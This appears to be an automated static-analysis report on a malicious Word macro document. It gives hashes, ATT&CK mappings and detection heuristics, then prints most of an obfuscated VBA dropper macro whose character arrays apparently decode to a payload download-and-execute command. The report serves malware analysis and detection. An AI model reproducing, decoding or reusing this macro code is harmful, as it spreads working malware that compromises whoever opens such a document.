Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dc037212c26afc36…

MALICIOUS

Office (OLE)

Size: 236.5 KB
Created: 2018-06-27 18:42:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: e5b5e9d9804cfc6b84fd0c67ade8067a
SHA-1: b1d6276ae6a7deb5631fd66dc49e4a83dde660cc
SHA-256: dc037212c26afc3632e3a7dcec2ab7bf6d7b72d94bce9794142af1881788c0e5
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. A critical heuristic firing indicates a Shell() call within the VBA code, suggesting the execution of arbitrary commands. This is further supported by the 'Doc.Dropper.Agent-6593370-0' ClamAV detection. The AutoOpen macro is likely responsible for initiating this malicious behavior, aiming to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6593452-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6593452-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10598 bytes
SHA-256: 317fbacc18cb215c6faefc51932112d096354232a741cb1990869a953543987c
First 1,000 lines of the extracted script
Attribute VB_Name = "TjbNjVolhhY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LziizCwTzolC"
Function uSXbFmNPDbD()
On Error Resume Next
nZuUD = 62119
DUwupF = 11948
zIzuir = 18560
rHBEuT = oQMcOw
FoYoB = Sin(21501)
qoWjW = CDate(2752)
RcvpzKbTq = "Hell  -j" + "oin" + Chr(40) + " " + Chr(40) + " 2" + "5, 109," + "122" + ",114" + ", 0" + ",83,8" + "8 ,74,16"
TqJpk = 10595
zvDAa = CDate(74211)
oqHbs = 365
JltHEV = Sin(60333)
FSYks = 54993
aObtzK = EAksfw
wQCGNLUGqGS = ",82 , " + "95, 87" + " , " + "88, 94 " + ", " + "73 " + ",29 ,11" + "5,88 "
moqENi = 99619
wcKdu = CDate(74418)
rkbbb = 28324
tnPKJk = Sin(60712)
LXrZTQ = 61266
NsFsV = CJEhDu
pAstfRJwmVc = ", 73 , " + "19,106 " + ",88, 95" + ", 126," + "81" + " ,84 , 8" + "8 , 83 "
TXravD = 30291
upNSD = CDate(10616)
tkiLW = 54348
pkfdKd = Sin(89730)
RlzZYX = 4290
lPHpqB = ZEQTPQ
SwhMTpPwBV = ", " + "73,6" + ",25, 1" + "12" + ",74 ," + " 110, 0" + " ,26, " + "85, " + "73" + ",73, 77 " + ",7 , 1" + "8,18 "
bWiAi = 14143
zqiJQ = CDate(87509)
jnmGp = 96824
CpWYT = Sin(88327)
kWIJuL = 48028
jhnfUi = QRddw
krLJj = ",74 ," + "74 ," + " 74 , 19" + ",78 ,92" + ", 80,79 " + ", 92" + " ,73 ," + " 84 ,8" + "3 " + ", 8" + "9, 84 ,9"
XjpEqj = 77177
Lsuin = CDate(47511)
cGFiU = 60059
UqVsh = Sin(33173)
wbjioG = 96784
cLfZLN = ikIFn
aazjUmB = "2,8" + "3,19 ," + " 94,82," + "80 , 19" + ", 92 " + ",72 ," + "18," + "71, 1" + "16 ,85, "
uAKGP = 91090
rjcLfu = CDate(16913)
JunNFz = 30159
XirCwk = Sin(31899)
NkmsRk = 64242
jZVBwo = fzlFP
SZjorZGv = "113 " + ", 71, " + "71 ,18 " + ",125 ,85" + " ,73,7" + "3 ," + "77" + " ," + " 7" + " ,1"
XYCzNz = 1406
YXPObQ = CDate(65518)
OMDZd = 75596
UshhR = Sin(49574)
VUEQS = 53945
fjWoi = hETza
wXDzNZFbMv = "8," + "18 , 74," + "74 ," + " 74 , 1" + "9,8" + "4, " + "83 , 16" + ", 80 ,92" + ",90, 92"
XrfUF = 27363
LrzCb = CDate(92049)
oWmhAV = 79756
kwWwJ = Sin(44463)
oKCWnT = 94549
VcWab = zbQDMY
sYjczDN = " ,7" + "1 ,8" + "4 ," + "83, 88" + ", 19 , " + "92 , " + "78 ," + "73,1"
KOstNA = 10292
npmrn = CDate(18950)
FqcfRR = 51083
uFwHmi = Sin(74452)
CTNtpz = 75191
UjYWhS = DoLAO
XGXwAlClDR = "6,94,8" + "2,80, 19" + ",7" + "9, 72, 1" + "8 ,71, " + "114 " + ",89, 81" + " ,"
bhRFYP = 27068
iMWMKw = CDate(39400)
HubDF = 84832
uONjK = Sin(25526)
iiCscm = 23334
jiHRQK = rSjatF
ujHNw = "9,90, 12" + "3, 91 " + ",6" + "8 ," + " 84, 18" + " ,12" + "5, 85 " + ", 73 ," + "73 , 77," + " 7"
uSXbFmNPDbD = RcvpzKbTq + wQCGNLUGqGS + pAstfRJwmVc + SwhMTpPwBV + krLJj + aazjUmB + SZjorZGv + wXDzNZFbMv + sYjczDN + XGXwAlClDR + ujHNw
NQlXZ = 45708
tDKqJ = CDate(62906)
SMNvq = 59071
ocqOm = Sin(99435)
Ohshd = 19914
UKVTEv = YoYQU
End Function
Function ThwpO()
On Error Resume Next
nintd = 92656
Zzhrrz = CDate(11454)
QwzKi = 39600
bzFnzO = Sin(61050)
YJDFh = 96164
BCqhvI = nRoqt
wUVWdfftp = ", 18 , 1" + "8,78 , 8" + "4 ,73,8" + "8, 78" + " , 19," + " 95 , 8" + "1,72 " + ", 88"
VzPIJr = 69705
aMvaOh = CDate(88339)
qfrcW = 95845
pfjPb = Sin(46212)
ndISXh = 10090
PJnTrz = zzSooM
KKQSoQVptr = ", 7" + "8, 86" + ", " + "68,89 ,8" + "4, 90,84" + ", 73," + " 92" + ",81 , 1" + "9 , "
LRYVJ = 68147
wPcav = CDate(20409)
nEZkc = 99832
zBzMv = Sin(67102)
fjwjv = 87124
hUmAc = iAUSjh
BKZQIAj = "94," + " 8" + "2,80" + " , 1" + "9, 92" + " ,72 " + ", 18,1" + "24 ," + "69 , 7" + "3 ,101" + " ,105 ,"
LbIiAl = 71928
mEmzq = CDate(49068)
zUGkwk = 78402
AvHTrI = Sin(21632)
wJhpJU = 9087
snsJi = BYDFjb
iwHwXOpRkq = "11" + "2, 9 ,18" + " , 125 " + ", 85 ," + " 73 ,73" + ",77 , 7" + " ,18 " + ",18, " + "74,74 " + ",74" + " , 1" + "9, 8"
MjPLG = 4398
FWaNhI = CDate(35207)
KbHpq = 18475
FuIzl = Sin(5253)
zuzrwX = 78042
BBwQvi = UVQwk
iWafwzkE = "7 , " + "89,78" + " , " + "88 ," + " 7" + "9 ,75, 8" + "4 , 94"
WAFXKl = 53406
UnAVCl = CDate(2199)
bIwzz = 32653
aqs
... (truncated)